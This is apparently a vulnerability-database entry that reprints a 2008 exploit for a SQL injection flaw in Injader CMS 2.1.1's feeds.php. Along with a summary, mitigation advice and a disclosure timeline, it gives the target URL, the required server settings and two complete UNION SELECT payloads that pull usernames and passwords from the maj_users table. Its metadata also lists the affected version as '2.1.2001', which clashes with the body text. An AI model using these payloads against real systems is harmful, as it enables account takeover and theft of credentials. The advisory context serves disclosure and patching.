Injader CMS

vendor:

Injader CMS

by:

milw0rm.com

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Injader CMS

Affected Version From: 2.1.2001

Affected Version To: 2.1.2001

Patch Exists: YES

Related CWE: N/A

CPE: a:injader:injader_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

An attacker can exploit a SQL injection vulnerability in Injader CMS 2.1.1 by sending a specially crafted HTTP request to the vulnerable server. The vulnerable parameter is 'id' in the 'feeds.php' script. The attacker can use the UNION operator to extract data from the database. The attacker can also use the CONCAT() function to extract the username and password from the 'maj_users' table.

Mitigation:

Upgrade to Injader CMS 2.1.2 or later.

Source

Exploit-DB raw data:

Injader CMS
http://www.injader.com/



- (= 2.1.1 -

- SQL -
http://localhost/upload/feeds.php?name=articles&id=<SQL>
magic_quotes_gpc = Off
register_globals = On


Username (urlencode):
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511
Pass:
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758



- Timeline -
Author notified: Nov 30, Dec 09,10
Injader 2.1.2: Dec 12
Public disclosure: Dec 18


- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-18]